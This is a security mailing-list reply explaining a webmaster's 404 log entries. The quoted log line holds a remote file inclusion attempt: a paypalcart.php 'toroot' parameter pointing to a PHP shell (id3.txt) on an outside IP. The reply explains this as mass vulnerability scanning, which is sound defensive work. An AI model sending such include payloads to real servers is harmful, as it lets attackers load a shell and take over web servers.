Re: 404 messages pointing to a strange location

[Stefan Tanase <stefant () kaspersky ro>]

Hello Simon,

Simon wrote:
> Yesterday evening I had lots of 404-messages from my web server, all 
> pointing to locations like
> http://foo.bar/something//ee_commerce/paypalcart.php?toroot=http://220.134.244.157/xoops/templates_c/id3.txt? 

ID3 is a well known PHP shell - PHP shells are scripts used by "bad 
guys" to gain access to your web server through an exploitable page in 
your website, for example through a vulnerable include statement.

> I don't use paypal or anything similar on my page; what does that mean?

They are usually scanning thousands of web servers in search of the same 
vulnerabilities. You may not be using those vulnerable scripts (like 
paypalcart.php in this case) but some other webmasters may do :)

> I'm wondering because this messages came in only yesterday before 
> midnight, several dozens.

Popular websites get requests like this 24/7 - it's just a matter of 
time until your server is found and they start scanning it for 
vulnerabilities.

It's a good idea to keep an watch on this stuff, so you can make sure 
your websites are not vulnerable.

Cheers,
--
Stefan TANASE, AV Researcher
Global Research & Analysis Team
Kaspersky Lab Romania
http://www.kaspersky.ro/
KeyID: 0xDD749E1B

-------------------------------------------------------------------------
Sponsored by: Watchfire 
Methodologies & Tools for Web Application Security Assessment 
With the rapid rise in the number and types of security threats, web application security assessments should be considered a crucial phase in the development of any web application. What methodology should be followed? What tools can accelerate the assessment process? Download this Whitepaper today! 

https://www.watchfire.com/securearea/whitepapers.aspx?id=70170000000940F
-------------------------------------------------------------------------